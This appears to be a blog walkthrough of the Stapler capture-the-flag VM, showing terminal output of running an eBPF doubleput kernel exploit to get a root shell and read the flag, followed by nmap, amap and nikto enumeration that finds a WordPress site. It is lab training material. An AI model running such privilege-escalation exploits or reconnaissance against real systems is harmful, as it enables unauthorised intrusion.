MFrei@red:/tmp$ cd ebpf_mapfd_doubleput_exploit/
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ compile.sh
-bash: compile.sh: command not found
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./ compile.sh
-bash: ./: Is a directory
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function ‘make_setuid’:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ doubleput
-bash: doubleput: command not found
MFrei@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:/tmp/ebpf_mapfd_doubleput_exploit# whoami
root
root@red:/tmp/ebpf_mapfd_doubleput_exploit#
As is the way on these things, the flag is in the root folder:
root@red:/root# cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
root@red:/root#
So that’s one way but I didn’t even get to look at other attack entries. The website, another possible wordpress site and probably some other methods exist on this box.
ports. conf says it’s listening on port 12380 which was not picked up by the short nmap scan so defo at least two webs to look at.
I’ll return to this later.
EDIT
OK I’m back on this now and want to take a look at the web side of things. On some recent boxes I’ve been caught out with my insufficient enumeration, relying on short nmap scans of main ports, not using other scans to verify the protocols (you can’t assume port 80 is plain http and 443 is definitely ssl). So my enumuration plan is full port nmap scans for tcp and udp, amap scan of the ports to confirm the protocols, nikto and dirbuster. Also check out the robots.txt.
NMAP – All Ports
My all ports scan is back now and well worth the wait:
root@kali2017-1:~# nmap -sS -sU -T4 -n 10.0.0.4 -p 0-65535 Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 12:59 GMT Stats: 0:02:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 35.95% done; ETC: 13:05 (0:03:57 remaining) Stats: 0:05:17 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 76.73% done; ETC: 13:05 (0:01:36 remaining) Stats: 0:13:15 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan UDP Scan Timing: About 92.31% done; ETC: 13:12 (0:00:32 remaining) Nmap scan report for 10.0.0.4 Host is up (0.00021s latency). Not shown: 65535 open|filtered ports, 65529 filtered ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 53/tcp open domain 80/tcp open http 139/tcp open netbios-ssn 3306/tcp open mysql 12380/tcp open unknown 137/udp open netbios-ns
Two ports I’d not seen on the initial scan. I’ll put port 137 on the back burner for now as it’s clearly not web but will quickly check out 12380. Doing a more thorough nmap scan of the 12380 port
root@kali2017-1:~# nmap -A -n -P0 -T5 -p 12380 10.0.0.4 Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 13:30 GMT Nmap scan report for 10.0.0.4 Host is up (0.00082s latency). PORT STATE SERVICE VERSION 12380/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Tim, we need to-do better next year for Initech
OK so another web-related port. So let’s give amap a spin. My vmware crashed ( Windows Defender I think) so the Stapler machine now has a new IP 10.0.0.44:
root@kali2017-1:~# amap -A 10.0.0.44 80 amap v5.4 (www.thc.org/thc-amap) started at 2017-11-21 14:26:24 - APPLICATION MAPPING mode Protocol on 10.0.0.44:80/tcp matches http Unidentified ports: none. amap v5.4 finished at 2017-11-21 14:26:31 root@kali2017-1:~# amap -A 10.0.0.44 12380 amap v5.4 (www.thc.org/thc-amap) started at 2017-11-21 14:26:36 - APPLICATION MAPPING mode Protocol on 10.0.0.44:12380/tcp matches http Protocol on 10.0.0.44:12380/tcp matches http-apache-2 Protocol on 10.0.0.44:12380/tcp matches ntp Protocol on 10.0.0.44:12380/tcp matches ssl Unidentified ports: none.
So port 80 is straightforward but port 12380 isn’t and include other protocols including SSL. Now run nikto on both web ports:
root@kali2017-1:~# nikto -host 10.0.0.44
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.0.44
+ Target Hostname: 10.0.0.44
+ Target Port: 80
+ Start Time: 2017-11-21 14:29:40 (GMT0)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2017-11-21 14:29:54 (GMT0) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali2017-1:~# nikto -host 10.0.0.44 -port 12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.0.44
+ Target Hostname: 10.0.0.44
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2017-11-21 14:32:55 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '10.0.0.44' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7672 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2017-11-21 14:34:46 (GMT0) (111 seconds)
---------------------------------------------------------------------------
Not much on port 80 but a couple of files that might indicate the home directory of a user. More going on on port 1280 though:
- an SSL cert so need to check out the https
A robots.txt file with two entries: /admin112233/ and /blogblog/
An apache file /icons/README
phpmadmin directory at /phpmyadmin/
Let’s see what’s at port 80 in Firefox
Not much there and the scans don’t indicate much. I ran dirb on it which didn’t find anything else either. So onto 12380
A basic website with little functionality. Page source didn’t show much other than a message from HR and a Base64 encoded image. Maybe look into that another time.
Try the https version and there are two folders including what looks like a troll admin112233 to cut a long story short there is a WordPress site at https://10.0.0.44:12380/blogblog
Our mate John gets a seconds name here. I fire up Burp Suite and spider the site plus run Dirbuster which brings up a few things: many of the WordPress directories are listable.
Leave a Reply